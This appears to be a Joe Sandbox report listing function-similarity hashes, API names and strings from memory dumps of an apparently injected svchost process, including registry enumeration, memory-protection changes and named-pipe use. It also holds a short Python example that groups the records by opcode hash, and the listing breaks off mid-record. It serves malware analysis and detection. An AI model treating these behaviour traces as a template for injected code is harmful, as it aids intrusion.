Control-flow Graph (rendered image; legend: Executed / Not Executed). Recoverable structure of the graph: the entry block 22f4b92104c-22f4b9210b9 calls RegQueryInfoKeyW; block 22f4b9210cf-22f4b92111f calls RegEnumValueW and is re-entered from block 22f4b9211a5-22f4b9211af, i.e. the values are enumerated in a loop; block 22f4b92114e-22f4b921193 calls GetProcessHeap, an internal function at 22f4b936168, GetProcessHeap again and HeapFree; the function exits through block 22f4b9211b5-22f4b9211d0.
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: ce9cefd1f562b99d9dbd7395918815e3e2e756b4851a030e7b44f7ae27ca4f18
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 7B417B36A14B8096E7A4DFA1E55839A77B1F389B88F048139DB8907659DF7CC499CB00
APIs
• FlsGetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D5F7
• FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D616
• FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D63E
• FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D64F
• FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D660
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction ID: c1771cd4d9f66d7745179ee4e672ef5854db48beb73a32ad212ef63d4f1f1538
• Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction Fuzzy Hash: CC113D28E08250A1FADCBFA2E77A36B22625F547A4F1C4B345A2D467D7DEACC441D640
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: a365d369036b2b26bbd370a9d4c31e0717dc197af8bbad51161d873adee3a40e
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 8181D03DE00201A6FAD0BFE5D659B5B22B1EB89782F548235AB4447797FAB9C847C700
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: c51334e39e5f5977e17591ee4fce557e36df1a67436e659bd583697e642eb82a
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 9081A028E04241A6FAD8BFE5D7793AB66B0A785B80F5448359B0863397EBFCCD45C701
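The two __scrt startup records above share one Opcode ID and Opcode Fuzzy Hash (631ceae6...) but carry different Instruction IDs and Instruction Fuzzy Hashes, because the same function body was dumped from two regions of the svchost process (offsets 0000022F4B8F0000 and 0000022F4B920000): the opcode sequence is identical, only the operands (addresses, relocations) differ. When a report lists hundreds of such records, the useful triage question is which functions recur across dump sources. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the bullet-list record format used on this page and groups records by Opcode ID. The record text embedded in it is transcribed from three records of this report; the function names parse_records, shared_functions and instruction_variants are the example's own and not Joe Sandbox API.

```python
import re
from collections import defaultdict

# Constructed input: three "Similarity" records transcribed from this report's
# svchost code dumps. The last two describe the same function at two offsets.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: ce9cefd1f562b99d9dbd7395918815e3e2e756b4851a030e7b44f7ae27ca4f18
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 7B417B36A14B8096E7A4DFA1E55839A77B1F389B88F048139DB8907659DF7CC499CB00
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: a365d369036b2b26bbd370a9d4c31e0717dc197af8bbad51161d873adee3a40e
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 8181D03DE00201A6FAD0BFE5D659B5B22B1EB89782F548235AB4447797FAB9C847C700
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: c51334e39e5f5977e17591ee4fce557e36df1a67436e659bd583697e642eb82a
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 9081A028E04241A6FAD8BFE5D7793AB66B0A785B80F5448359B0863397EBFCCD45C701
"""

# "• Label: value" bullet lines; the label never contains a colon, the value may.
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
# The dump base is carried inside the Source File line as "Offset: <hex>".
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def parse_records(text):
    """Split a function-similarity listing into one dict per 'Memory Dump Source'
    block. Keys are the bullet labels ('Opcode ID', 'Instruction ID', ...),
    plus 'Offset' extracted from the Source File line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # section labels such as 'Similarity' carry no value
        key, value = m.group(1), m.group(2)
        current[key] = value
        if key == "Source File":
            off = OFFSET_RE.search(value)
            if off:
                current["Offset"] = off.group(1).upper()
    return records


def shared_functions(records):
    """Map Opcode ID -> sorted list of dump offsets it was recovered at, keeping
    only IDs seen at more than one offset: an identical opcode hash at two
    bases means the same function body exists in both memory regions."""
    by_opcode = defaultdict(set)
    for rec in records:
        if "Opcode ID" in rec and "Offset" in rec:
            by_opcode[rec["Opcode ID"]].add(rec["Offset"])
    return {oid: sorted(offs) for oid, offs in by_opcode.items() if len(offs) > 1}


def instruction_variants(records, opcode_id):
    """Distinct Instruction IDs for one Opcode ID: same opcodes, different
    operands, which is what relocation to a different base produces."""
    return sorted({r["Instruction ID"] for r in records if r.get("Opcode ID") == opcode_id})


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for oid, offsets in shared_functions(recs).items():
        print(oid[:16], offsets, len(instruction_variants(recs, oid)), "instruction variant(s)")
```

Running it prints one shared Opcode ID (631ceae6...) found at both offsets with two instruction variants; the registry-enumeration record (4e806da6...) is reported only once, so it was recovered from a single region. The same grouping can be extended to the Instruction Fuzzy Hash to find near-duplicate, rather than identical, functions across dumps.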
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction ID: 83e3394d01f89b93c26caa66c7161ea38b1c3006fc4177b8ceb87af8da782049
• Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction Fuzzy Hash: E431E42AE02640B1FED9AFC2EA2875623B4B749BA0F5949349E1D07392DFBDC446C300
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction ID: 843c655eff9d0843dd08c6668f8e99b76e5e9d14655632ee1d941493a23cb1a3
• Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction Fuzzy Hash: 8B119625718B5096E390AFD6EA6831A76B0F78CBE4F005234DB5A87796CFB8C854C744
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 6d56411059032b96cf52a3874d0fa3f23297c4528b6b1fff269c96f9af339486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43117C2AB0874096FF98AF92F52826A63B0F789B84F040439DF8907B56EF7DC504C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction ID: 32b35987f1af40d05fee103414a54acafcb92e9c4dcd903076f14a56b9b4652b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64D1AF3AA05B5891EAB4AF56E5A435B77B0F388B84F100536EB8D4776ADF7CC550CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-4180442734
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: d3b748ffa8e7437680072e1bbf71ede5a447bdbe8d5ccdd4027060030305e6d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F33180AF90DBC0AAE395AFE5DA6925A3FB0F38DF40F09E035DB4403247DAA49810C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: df63000a15ab9cdbea4b867a8bc7b3749937bdd8427f911b5941a662304442a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F112C28E09650A1FADCBFA1D77A72B22625F447A4F184B349A2A467DBDEECC441D240
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: ab1870f1ce097217d8c9d697d67a50e8735f31fb0d972f3aff40e2a40e560407
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05015B25B04A4096FB94EF92E66835A63B1FB8CBC0F488434DF4943756DEBCC959C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 0aa6039e52b4918b93c01abbad45a58908e3a9be5c1d2ca752cb9836a2e5124c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96015E68E1970096FFA4AF92EA2C31733B4BB49B82F044438CB4906366EF7CC048C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 4553abeba055ab04a372ecc5a7a4898a1852b619a9a65a411e6718b2ce24e83f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF04426B04681A2F7A0AFE1F6A875B6770F758BC8F845130DB4946556DFBCC698CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 38295ac2f10e6acd3025a4b2d7b3c232d4005dcb1e6e2f8afdf00ddaeae397fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4F0C229A15A04A1FB54AFA8E96C31B1370EB8AB60F501639D76A451F5CFBCC048C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: a6493de3bd87cb8cdda4218573b9a46cfca1558a9276ad8d2e3f8f7c75dd7c6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0F458A1874092EA946F97FA2815A6671EB4DFD0F185030DF464775ADE7CC445C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: 370301996a2ab511c1da1f39ae5fb5ae372b66f22cbdb69476c090a222718a5b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7102DA36A19B8096E7A4DF95E5A475BB7B0F3C4790F104425EB8E87BA9DBBCC444CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: 44fbaf4a04e1f9394b62009381191711660d1decb432d2e121cf4a7aea086afe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8261B83AD19A40D6E6A49F55E56831BB7B0F388B84F104535EB8D43BAADBBCC540CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 9c8685abdbdec31bd0a56245f8e3f9dfc6400e32a94bf70fe500d8c082ed615a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B411E32EE18A0065F6D439E9DB7F36732706F6D374F0A4230AB66067EBDAE4C841D200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: bf8130e1b470344c310bc1a61583eaefc5403b2d5f03dcf87c41d7e09db68d9a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86114F2EE50A5121F6D43DECD66D3671170AB5D76CF072634ABB7067E7CAA498C1C310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 3670dfeb68e6a3868c26fbac9b743974663a211845548ffc8ba6f07efe711055
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B251D439F11600AAEB98EF55E6A8B6A37B5FB44B88F108930DB454375AD7BDC841C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: ad0099a4be0fb7298ef0ba603d511e01c9597efdd1c1fe225817b5613d30491c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D361B336D04BC491E7A5AF55E59439BB7B0F795B84F048A35EB9803B9ACBBCC194CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
